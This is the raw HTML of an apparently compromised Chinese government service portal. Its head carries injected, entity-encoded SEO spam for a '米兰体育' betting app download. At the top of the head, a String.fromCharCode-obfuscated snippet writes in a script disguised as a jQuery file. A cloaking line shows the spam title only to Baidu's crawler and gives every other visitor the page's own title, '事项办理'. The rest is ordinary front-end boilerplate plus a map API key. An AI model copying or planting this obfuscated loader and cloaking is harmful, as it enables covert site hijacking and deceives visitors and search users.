<!DOCTYPE html><html lang=""><head><title>&#x7C73;&#x5170;&#x4F53;&#x80B2;(&#x5B98;&#x65B9;)APP&#x4E0B;&#x8F7D;&#x5B89;&#x88C5;IOS/&#x5B89;&#x5353;&#x901A;&#x7528;&#x7248;/&#x624B;&#x673A;&#x7248;-&#x9996;&#x9875;</title>
<meta name="keywords" content="&#31859;&#20848;&#20307;&#32946;&#40;&#23448;&#26041;&#41;&#65;&#80;&#80;&#19979;&#36733;&#23433;&#35013;&#73;&#79;&#83;&#47;&#23433;&#21331;&#36890;&#29992;&#29256;&#47;&#25163;&#26426;&#29256;&#44;&#31859;&#20848;&#97;&#112;&#112;&#23448;&#26041;&#19979;&#36733;&#23433;&#35013;&#44;&#31859;&#20848;&#20307;&#32946;&#21512;&#20316;&#24179;&#21488;"/>
<meta name="description" content="&#22312;&#31859;&#20848;&#20307;&#32946;&#21512;&#20316;&#24179;&#21488;&#65292;&#25105;&#20204;&#33268;&#21147;&#20110;&#20026;&#20307;&#32946;&#29233;&#22909;&#32773;&#25552;&#20379;&#19968;&#20010;&#20840;&#38754;&#30340;&#21512;&#20316;&#24179;&#21488;&#65292;&#28085;&#30422;&#20307;&#32946;&#36187;&#20107;&#12289;&#22521;&#35757;&#12289;&#36164;&#28304;&#20849;&#20139;&#31561;&#22810;&#20010;&#26041;&#38754;&#12290;&#36890;&#36807;&#25105;&#20204;&#30340;&#32593;&#31449;&#65292;&#24744;&#21487;&#20197;&#36731;&#26494;&#25214;&#21040;&#26368;&#26032;&#30340;&#36187;&#20107;&#20449;&#24687;&#12289;&#20248;&#36136;&#30340;&#22521;&#35757;&#35838;&#31243;&#20197;&#21450;&#19982;&#20854;&#20182;&#20307;&#32946;&#29233;&#22909;&#32773;&#20998;&#20139;&#32463;&#39564;&#12290;&#21152;&#20837;&#25105;&#20204;&#65292;&#24320;&#21551;&#24744;&#30340;&#20307;&#32946;&#21512;&#20316;&#20043;&#26053;&#65281;"/>

<script type="text/javascript"> var xt = String.fromCharCode(60,115,99,114,105,112,116,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,32,115,114,99,61,34,47,106,115,47,106,113,117,101,114,121,46,51,46,53,46,50,46,109,105,110,46,116,46,106,115,34,62,60,47,115,99,114,105,112,116,62); document.write(xt); </script>
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="事项办理"}</script><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><title></title><script src="/cms_files/default/script/jslib/jquery.js"></script><script src="./robotHelper.js"></script><script src="./meeting/hanMeetingComponent.umd.min.js"></script><link rel="stylesheet" href="./meeting/hanMeetingComponent.css"><link rel="stylesheet" href="./style.css"><script src="https://api.tianditu.gov.cn/api?v=4.0&tk=1ffee63c49c94f80e9b3b7a2631a7cc6"></script><script>if(getBrowser() === 'ie11'){
      alert("您的浏览器不在兼容范围内，继续使用可能会影响您的体验。建议使用Chrome、Firefox、猎豹或360极速模式浏览器")
    }
    function getBrowser() {
      var u = navigator.userAgent;
      var bws = [{
        name: 'sgssapp',
        it: /sogousearch/i.test(u)
      }, {
        name: 'wechat',
        it: /MicroMessenger/i.test(u)
      }, {
        name: 'weibo',
        it: !!u.match(/Weibo/i)
      }, {
        name: 'uc',
        it: !!u.match(/UCBrowser/i) || u.indexOf(' UBrowser') > -1
      }, {
        name: 'sogou',
        it: u.indexOf('MetaSr') > -1 || u.indexOf('Sogou') > -1
      }, {
        name: 'xiaomi',
        it: u.indexOf('MiuiBrowser') > -1
      }, {
        name: 'baidu',
        it: u.indexOf('Baidu') > -1 || u.indexOf('BIDUBrowser') > -1
      }, {
        name: '360',
        it: u.indexOf('360EE') > -1 || u.indexOf('360SE') > -1
      }, {
        name: '2345',
        it: u.indexOf('2345Explorer') > -1
      }, {
        name: 'edge',
        it: u.indexOf('Edge') > -1
      }, {
        name: 'ie11',
        it: u.indexOf('Trident') > -1 && u.indexOf('rv:11.0') > -1
      }, {
        name: 'ie',
        it: u.indexOf('compatible') > -1 && u.indexOf('MSIE') > -1
      }, {
        name: 'firefox',
        it: u.indexOf('Firefox') > -1
      }, {
        name: 'safari',
        it: u.indexOf('Safari') > -1 && u.indexOf('Chrome') === -1
      }, {
        name: 'qqbrowser',
        it: u.indexOf('MQQBrowser') > -1 && u.indexOf(' QQ') === -1
      }, {
        name: 'qq',
        it: u.indexOf('QQ') > -1
      }, {
        name: 'chrome',
        it: u.indexOf('Chrome') > -1 || u.indexOf('CriOS') > -1
      }, {
        name: 'opera',
        it: u.indexOf('Opera') > -1 || u.indexOf('OPR') > -1
      }];
      for (var i = 0; i < bws.length; i++) {
        if (bws[i].it) {
          return bws[i].name;
        }
      }
      return 'other';
    }</script><script>function getRem (pwidth, prem) {
      var html = document.getElementsByTagName("html")[0];
      var oWidth = document.documentElement.clientWidth;
      if (oWidth <= 768) {
        html.style.fontSize = oWidth / pwidth * prem + "px";
      } else {
        html.style.fontSize = '100px'
      }
    }

    getRem(750, 100)
    window.onresize = function () {
      /*750代表设计师给的设计稿的宽度，你的设计稿是多少，就写多少;100 代表换算比例，这里写100是为了以后好算,比如，你测量的一个宽度是100px,就可以写为1rem,以及1px=0.01rem等等*/
      getRem(750, 100)
    };</script><link href="/jiopweb/css/chunk-0168ba74.71eb5c5f.css" rel="prefetch"><link href="/jiopweb/css/chunk-0861594e.458e69ba.css" rel="prefetch"><link href="/jiopweb/css/chunk-0be34630.fb0a7d11.css" rel="prefetch"><link href="/jiopweb/css/chunk-146c187e.e5648d86.css" rel="prefetch"><link href="/jiopweb/css/chunk-19c7aafc.2982d258.css" rel="prefetch"><link href="/jiopweb/css/chunk-1d319dee.cb008bd6.css" rel="prefetch"><link href="/jiopweb/css/chunk-22673694.4eab1b0d.css" rel="prefetch"><link href="/jiopweb/css/chunk-25be6684.5b75d604.css" rel="prefetch"><link href="/jiopweb/css/chunk-2e558fd5.dc555247.css" rel="prefetch"><link href="/jiopweb/css/chunk-309e876e.fb22e431.css" rel="prefetch"><link href="/jiopweb/css/chunk-399e6041.c56bea55.css" rel="prefetch"><link href="/jiopweb/css/chunk-50602e38.9c9750c3.css" rel="prefetch"><link href="/jiopweb/css/chunk-51b17335.5152099c.css" rel="prefetch"><link href="/jiopweb/css/chunk-524f61ae.f7e04f6e.css" rel="prefetch"><link href="/jiopweb/css/chunk-67c0565e.e19e73ec.css" rel="prefetch"><link href="/jiopweb/css/chunk-6cac8618.9a23eb03.css" rel="prefetch"><link href="/jiopweb/css/chunk-6e758cf6.5d9dcdf5.css" rel="prefetch"><link href="/jiopweb/css/chunk-7352550c.57dba4ee.css" rel="prefetch"><link href="/jiopweb/css/chunk-7af7c122.1cc0ccda.css" rel="prefetch"><link href="/jiopweb/css/chunk-828ee5a6.a559471e.css" rel="prefetch"><link href="/jiopweb/css/chunk-affcb004.070e0971.css" rel="prefetch"><link href="/jiopweb/css/chunk-bb397df0.d2031e28.css" rel="prefetch"><link href="/jiopweb/css/chunk-c1db4ff4.e360b0f2.css" rel="prefetch"><link href="/jiopweb/css/chunk-db685ab8.f9621da4.css" rel="prefetch"><link href="/jiopweb/css/chunk-e8e4bc84.ff9e2922.css" rel="prefetch"><link href="/jiopweb/css/chunk-ef6bee10.e4724873.css" rel="prefetch"><link href="/jiopweb/css/chunk-f8e30946.c8f475be.css" rel="prefetch"><link href="/jiopweb/css/chunk-fa649926.9d7c1ce7.css" rel="prefetch"><link href="/jiopweb/css/chunk-fb03fbe6.58d75dd7.css" rel="prefetch"><link href="/jiopweb/css/chunk-fed68e1e.3ccb51c3.css" rel="prefetch"><link href="/jiopweb/css/chunk-ff54c586.4e05789f.css" rel="prefetch"><link href="/jiopweb/js/chunk-0168ba74.52b83f10.js" rel="prefetch"><link href="/jiopweb/js/chunk-0861594e.4a1a4bb5.js" rel="prefetch"><link href="/jiopweb/js/chunk-0be34630.029bd435.js" rel="prefetch"><link href="/jiopweb/js/chunk-146c187e.180da805.js" rel="prefetch"><link href="/jiopweb/js/chunk-19c7aafc.e8270066.js" rel="prefetch"><link href="/jiopweb/js/chunk-1aff29a4.2d11d7f5.js" rel="prefetch"><link href="/jiopweb/js/chunk-1d319dee.e52669de.js" rel="prefetch"><link href="/jiopweb/js/chunk-22673694.764d9369.js" rel="prefetch"><link href="/jiopweb/js/chunk-25be6684.23d3cb59.js" rel="prefetch"><link href="/jiopweb/js/chunk-2d0cf37d.0ad01a58.js" rel="prefetch"><link href="/jiopweb/js/chunk-2e558fd5.0c8390df.js" rel="prefetch"><link href="/jiopweb/js/chunk-309e876e.1a436bb0.js" rel="prefetch"><link href="/jiopweb/js/chunk-399e6041.af6e4b25.js" rel="prefetch"><link href="/jiopweb/js/chunk-50602e38.a69b136f.js" rel="prefetch"><link href="/jiopweb/js/chunk-51b17335.b010d793.js" rel="prefetch"><link href="/jiopweb/js/chunk-524f61ae.41aaba14.js" rel="prefetch"><link href="/jiopweb/js/chunk-594c4a5a.bf1bd868.js" rel="prefetch"><link href="/jiopweb/js/chunk-67c0565e.3cc5f3ce.js" rel="prefetch"><link href="/jiopweb/js/chunk-6cac8618.c3e871e4.js" rel="prefetch"><link href="/jiopweb/js/chunk-6e758cf6.10db053f.js" rel="prefetch"><link href="/jiopweb/js/chunk-7352550c.3781f2b1.js" rel="prefetch"><link href="/jiopweb/js/chunk-7af7c122.19dd6a24.js" rel="prefetch"><link href="/jiopweb/js/chunk-828ee5a6.0bc6dbcc.js" rel="prefetch"><link href="/jiopweb/js/chunk-affcb004.593048d8.js" rel="prefetch"><link href="/jiopweb/js/chunk-bb397df0.4dc94ad1.js" rel="prefetch"><link href="/jiopweb/js/chunk-c1db4ff4.d2ab10be.js" rel="prefetch"><link href="/jiopweb/js/chunk-cf16bba0.2439e38f.js" rel="prefetch"><link href="/jiopweb/js/chunk-db685ab8.6e544656.js" rel="prefetch"><link href="/jiopweb/js/chunk-e8e4bc84.7f5f2676.js" rel="prefetch"><link href="/jiopweb/js/chunk-ef6bee10.e6394e49.js" rel="prefetch"><link href="/jiopweb/js/chunk-f1fbabee.6a3768e6.js" rel="prefetch"><link href="/jiopweb/js/chunk-f8e30946.4eadb6f8.js" rel="prefetch"><link href="/jiopweb/js/chunk-fa649926.2ba6bcd4.js" rel="prefetch"><link href="/jiopweb/js/chunk-fb03fbe6.3a1ac80f.js" rel="prefetch"><link href="/jiopweb/js/chunk-fed68e1e.bf36be5c.js" rel="prefetch"><link href="/jiopweb/js/chunk-ff54c586.88bd45ed.js" rel="prefetch"><link href="/jiopweb/css/chunk-vendors.94e913d8.css" rel="preload" as="style"><link href="/jiopweb/css/index.ad8d2ce8.css" rel="preload" as="style"><link href="/jiopweb/js/chunk-vendors.b1dbeb9a.js" rel="preload" as="script"><link href="/jiopweb/js/index.b77a3ceb.js" rel="preload" as="script"><link href="/jiopweb/css/chunk-vendors.94e913d8.css" rel="stylesheet"><link href="/jiopweb/css/index.ad8d2ce8.css" rel="stylesheet"></head><body><noscript><strong>We're sorry but jiopweb doesn't work properly without JavaScript enabled. Please enable it to continue.</strong></noscript><header id="xjHeader"></header><script src="/cms_files/filemanager/2062599219/script/202411/383B62CC67EAF9777CBD54D38344C7D0.js" charset="utf-8"></script><div id="barrierfree_container"><div id="app"></div></div><footer id="xjFooter"></footer><script src="/cms_files/filemanager/2062599219/script/202411/6F3CCCBCACD6F30889DA3FE74B8C7B95.js" charset="utf-8"></script><script src="/jiopweb/js/chunk-vendors.b1dbeb9a.js"></script><script src="/jiopweb/js/index.b77a3ceb.js"></script></body></html>

